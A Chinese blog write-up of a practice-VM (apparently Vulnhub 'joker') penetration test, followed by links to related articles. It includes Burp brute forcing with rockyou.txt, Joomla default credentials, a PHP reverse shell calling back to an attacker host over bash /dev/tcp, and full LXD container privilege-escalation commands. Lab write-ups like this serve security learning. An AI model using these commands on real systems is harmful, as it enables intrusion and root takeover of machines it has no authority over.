vulhub靶机joker渗透

最新推荐文章于 2023-11-23 19:03:03 发布
最新推荐文章于 2023-11-23 19:03:03 发布
阅读量2.8k 收藏 2
点赞数
分类专栏: 靶机渗透 文章标签: 安全 web安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56666960/article/details/122815599
版权

先设置为NAT模式

主机发现

Masscan快速扫描端口

服务扫描

访问8080端口,需要用户名和密码来登录

抓包,发现是base64加密,类似于tomcat的用户名和密码格式

放到intruder模块,爆破

第二个字典选择kali 里面/usr/share/wordlists/rockyou.txt 这是一个具有14万的字典

爆破得到用户名和密码

登录进来

发现是joomla搭建的,直接登后台,默认用户名和密码,joomla,joomla

进来找到index.php

写入反弹shell

<?php

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.224.130/5555 0>&1'");

?>

点击TemplatePreview预览index.php

端口监听,成功

看到lxd组,可以通过lxd容器提权

想要提升为root权限,我们需要给靶机挂载一个lxd镜像。可以在kali或者自己的服务器上从github下载build-alpine文件,然后执行build-alpine这个shell脚本。“build-alpine”,将以压缩文件的形式构建最新的Alpine镜像,最后我们需要在靶机中下载这个镜像。

git clone https://github.com/saghul/lxd-alpine-builder.git

cd lxd-alpine-builder

./build-alpine

生成一个tar.gz文件

切换到tmp目录下

wget http://192.168.224.130:80/alpine-v3.13-x86_64-20210218_0139.tar.gz

挂载镜像,同时取名为joker

lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias joker

Lxc image list

依次运行命令

lxc init joker ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

提权成功,进入容器之后,定位到/mnt/root即可查看目标主机资源

总结:知道了新的爆破字典rockyou.txt拥有14万条口令,对于joomla有了更深理解,学会了新的提权方式,lxd提权

 

Foe平凡
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulhub漏洞测试靶场
08-16
vulhub-master.zip
vulhub渗透测试靶机学习1
08-08
渗透测试靶机学习0x01 lampiao靶机准备环境靶机下载地址https://download.vulnhub.com/lampiao/Lampiao.zip
渗透测试-vulnhub靶机 joker
最新发布
2301_79441074的博客
11-23 79
kali配置代理 ,bp base64加密密码爆破,lxd提权
渗透测试part(三):Vulhub配置及打靶(以Drupal CVE-2018-7600为例)
m0_56592545的博客
06-25 1076
本系列总共分成了三个部分,在第一部分中对渗透测试进行了简要的概述,第二部分通过VMware搭建了Vulnhub的一个靶机,第三部分则在Ubuntu操作系统中基于Vulhub搭建了一个靶机并借助kali的Metasploit工具快速完成了对Drupal的渗透。t=N5K3t=N5K3t=N5K3t=N5K3t=N5K3打靶-vulhub靶场-drupal-CVE-2018-7600_哔哩哔哩_bilibilihttps://www.bilibili.com/video/BV1Tv4y1C7GC/?
Vegeta靶机总结
qq_45301512的博客
12-24 396
修改vegeta靶机的网络连接模式为NAT,然后发现使用nmap扫描,没有发现ip,然后百度修改了vegeta虚拟机,获得了ip百度的帖子: https://www.cnblogs.com/asstart/p/12626494.html再次使用nmap扫描网段,获得了ip,并且根据80端口打开了网站继续目录扫描根据获得的信息,依次去打开网站查看http://192.168.11.135/admin 下面只有个admin.php,并且打开什么也没有。
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(一)Tr0ll
hyjcking的博客
11-20 1898
超级详细的步骤,希望可以为你解决这台靶机提供思路 说实话这个靶机不算难,但是却能比较好的巩固自己的基础知识,期间也遇到了自己不太懂的知识,会做和做的快是有区别的,在渗透这条路上还是任重而道远呐,继续加油
Vulnhub靶场渗透测试系列DC-3(Joomla CMS漏洞和Ubuntu16.04漏洞)
qq_45722813的博客
12-07 2960
Vulnhub靶场渗透测试DC-3 靶机下载地址:https://www.five86.com/dc-3.html 攻击机为kali2021,IP地址:192.168.172.131 将靶机导入到VMware,设置网络模式为NAT模式,开启靶机虚拟机 在kali攻击机使用nmap进行存活主机发现来获取靶机IP地址,命令nmap -T4 -Pn 192.168.172.1/24 但是发现没有扫描到靶机IP,可能是靶机网络设置问题,参考文章:https://editor.csdn.net/md/?artic
安装vulhub靶机过程
05-03
安装vulhub靶机过程 在网络安全领域中,安装vulhub靶机是一个非常重要的步骤。Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。让漏洞复现变得更加...
web渗透测试靶机(新手)
05-07
web渗透测试靶机(新手)
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
服务器可以做为靶机吗_原创干货 | 从0到1靶机渗透实例之HA:joker
weixin_39705435的博客
11-19 448
听说转发文章会给你带来好运前言国庆过后事情慢慢没那么多了,我就开始整理了一下这个靶机的WP。这次靶机整体难度不算高,而且整个镜像也不大,适合新手练手使用。环境靶机:HA:Joker(ubuntu)Filename: joker.zipFile size: 856 MBMD5: F34A2D25CF07D119F4E19D7D0FCC3DE2SHA1: 380E9DABF962390184...
23. CTF综合靶机渗透(十六)
weixin_30564785的博客
08-19 1080
靶机说明: VM Name: JIS-CTF : VulnUpload Difficulty: Beginner Description: There are five flags on this machine. Try to find them. It takes 1.5 hour on average to find all flags. Only working with Virt...
vulnhub靶机-THALES: 1
臭nana的博客
03-18 4565
1、找到靶机ip:192.168.1.106 nmap -sn 192.168.1.0/24 2、扫描靶机端口,开放22和8080端口 3、先搜索对应中间件有没有公开漏洞,没有发现,于是先从8080端口入手,访问之后是一个tomcat服务默认页面,先扫描一下目录 可疑的就只有shell目录,但是访问就一直转圈,跟平常反弹shell的页面一样,所以猜测应该是作者测试时上传的,结合tomcat和shell目录,可以猜想应该是tomcat后台布置war包getshell,但是管理后台需要...
Vulnhub靶机:EVILBOX_ ONE(很详细)
LainWith的博客
07-08 2890
系列:EvilBox(此系列共1台) 发布日期:2021年08月16日 **难度等级:**低→中 **打靶目标:**取得 root 权限 + 2 Flag 靶机地址:https://www.vulnhub.com/entry/evilbox-one,736/ 涉及攻击方法:netdiscover主机发现 对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。 打开就是一个ubuntu站点,看不出什么东西,下一步自然是目录扫描了。 常规的dirsearch扫描完毕后,发现
OSCP练习:vulhub靶机TR0LL 2攻略
weixin_47311099的博客
04-22 4317
信息收集 主机发现 先用namp做个扫描 在这里插入图片描述 发现21ftp、22ssh、80http 网站信息收集 访问web页面,跟上一关一样没啥东西 爆一下网站目录 发现robots文件中告诉我们一些路径,将其保存当作dirb字典在进行爆破 果然又发现了几个路径,但是所有页面都是同一个图…以及一句话… 但是!当我们把图片下载下来,算一下MD5就会发现/dont_bother里的图片MD5跟其他的不一样! 看一眼图片二进制发现重要信息,y0ur_self会是突破电 strings cat_t
不要轻易使用 Alpine 镜像来构建 Docker 镜像,有坑!
程序猿DD
05-19 6590
点击上方蓝色“程序猿DD”,选择“设为星标”回复“资源”获取独家整理的学习资料!1. Go 语言镜像精简Go语言程序编译时会将所有必须的依赖编译到二进制文件中,但也不能完全肯定它使用的...
内网渗透笔记——vulnhub内网结课渗透
wang_zui_zui的博客
03-14 687
准备步骤: 靶机:Beelzebub ip地址:192.168.111.136 攻击机:kali ip地址:192.168.111.130 Vmware下NAT模式连接 一、进行信息收集 1、使用nmap命令扫网段 发现目标ip——192.168.111.136 2、对目标ip进行详细的扫描 发现开放了22和80两个端口,考虑能不能通过爆破22号端口来取得shell? 3.尝试爆破 利用user&pass.txt字典,为了防止电脑跑烂掉选择admin,user等较常用
Vulhub漏洞复现之Apache解析漏洞总结
来到了学渣的博客
01-30 4010
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 前文: 名字雷同但差个n的两种类型漏洞环境靶机vulnhubvulhub的区别 Vulhub漏洞复现之Dns域传送漏洞 Vulhub漏洞复现之Django (小于2.0.8)任意url跳转漏洞(CVE-2018-14574) Vulhub漏洞复现之Th...
Vulhub漏洞环境使用教程
热门推荐
Sea_Sand息禅
04-21 1万+
Vulhub是一个比较全面的漏洞集合,收集了近年来许多的重要漏洞,以开源的形式呈现,以docker的形式进行环境配置,提供了更简单的漏洞复现,只需要简单的命令即可实现漏洞复现。 1、vulhub下载 下载地址:https://github.com/vulhub/vulhub 2、docker安装 apt-get install docker.io 安装后注意使用时启动docke:serv...
python实现对靶机渗透测试
06-03
靶机进行渗透测试需要掌握一定的安全知识和工具使用技巧,以下是一个简单的基于Python的渗透测试脚本示例: ```python import socket # 靶机IP地址和端口号 target_ip = "192.168.1.100" target_port = 80 # 创建Socket对象 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # 连接靶机 client_socket.connect((target_ip, target_port)) # 发送HTTP请求 http_request = "GET / HTTP/1.1\r\nHost: " + target_ip + "\r\n\r\n" client_socket.send(http_request.encode()) # 接收响应数据 response_data = client_socket.recv(1024) # 输出响应数据 print(response_data.decode()) # 关闭Socket连接 client_socket.close() ``` 这个示例程序使用Python的Socket模块创建了一个TCP连接,连接到靶机的80端口,发送了一个HTTP GET请求,并接收了响应数据。这个程序只是一个简单的示例,实际的渗透测试需要更复杂的操作和工具。同时也需要注意,未经授权的渗透测试是非法的行为,需要遵守法律法规。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值